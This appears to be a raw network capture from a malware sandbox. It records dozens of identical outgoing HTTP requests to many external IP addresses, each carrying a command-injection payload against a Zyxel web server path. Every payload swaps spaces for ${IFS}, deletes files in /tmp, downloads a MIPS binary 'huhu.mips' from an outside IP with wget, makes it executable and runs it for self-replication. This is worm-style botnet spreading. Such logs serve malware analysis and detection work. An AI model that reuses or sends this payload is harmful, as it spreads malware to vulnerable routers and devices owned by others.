                                      Jan 19, 2024 17:29:41.963279963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6711192.168.2.145692879.157.8.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963326931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6712192.168.2.144502458.234.54.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963376999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6713192.168.2.145550886.84.255.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963392973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6714192.168.2.1444944110.249.236.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963445902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6715192.168.2.1458684161.124.195.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963481903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6716192.168.2.1436436166.167.5.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963512897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6717192.168.2.14450225.20.15.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963551998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6718192.168.2.1440508130.27.189.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963583946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6719192.168.2.1454362220.181.16.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963619947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6720192.168.2.1450842150.12.117.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963656902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6721192.168.2.143653447.39.37.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963701010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6722192.168.2.1445614118.239.109.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963732958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6723192.168.2.1441490167.150.129.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963768959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6724192.168.2.143323418.55.30.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963818073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6725192.168.2.1435140123.235.78.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963851929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6726192.168.2.1449024112.70.31.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963886976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6727192.168.2.145220482.4.63.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963932991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6728192.168.2.1446324143.13.128.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963980913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6729192.168.2.1460816163.223.10.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964008093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6730192.168.2.1459764190.241.162.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964041948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6731192.168.2.143755053.128.55.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964116096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6732192.168.2.1436998137.219.246.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964143038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6733192.168.2.145731453.87.173.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964190960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6734192.168.2.1438506183.144.218.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964246035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6735192.168.2.1452204159.57.186.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964283943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6736192.168.2.145840675.31.170.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964317083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6737192.168.2.1443788140.85.203.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964386940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6738192.168.2.143485475.66.91.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964437008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6739192.168.2.1454854195.248.66.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964466095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6740192.168.2.1446018137.138.71.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964492083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6741192.168.2.145980650.25.180.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964559078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6742192.168.2.1436674207.39.215.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964601040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6743192.168.2.145573220.183.250.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964638948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6744192.168.2.1450208101.8.89.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964698076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6745192.168.2.145579091.129.127.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964725018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6746192.168.2.144728485.115.207.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964766979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6747192.168.2.1452404159.60.25.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964793921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6748192.168.2.144395477.42.216.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964826107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6749192.168.2.144603664.119.50.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964858055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6750192.168.2.1438170143.89.42.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964931011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6751192.168.2.14487804.36.188.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.964975119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6752192.168.2.143428094.168.232.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965024948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6753192.168.2.1441208189.129.52.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965054035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6754192.168.2.1442892105.4.115.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965076923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6755192.168.2.1433808151.84.82.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965110064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6756192.168.2.1447394166.237.149.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965178967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6757192.168.2.1434376222.112.254.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965204954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6758192.168.2.144257666.128.19.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965231895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6759192.168.2.145198882.84.255.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965282917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6760192.168.2.1434398115.15.82.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965323925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6761192.168.2.1435962137.83.102.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965370893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6762192.168.2.1447168164.182.32.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965403080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6763192.168.2.145675444.106.207.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965464115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6764192.168.2.1453892220.3.99.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965496063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6765192.168.2.145414459.194.222.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965547085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6766192.168.2.143829477.120.180.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965569019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6767192.168.2.1448798138.194.12.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965605021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6768192.168.2.1452240170.136.59.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965622902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6769192.168.2.145350869.197.202.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965662956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6770192.168.2.1453892115.188.54.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965718031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6771192.168.2.144610064.235.228.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965759993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6772192.168.2.1440984108.72.224.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965776920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6773192.168.2.1459872210.202.158.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965802908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6774192.168.2.1447604209.198.6.116443
                                      TimestampBytes transferredDirectionData
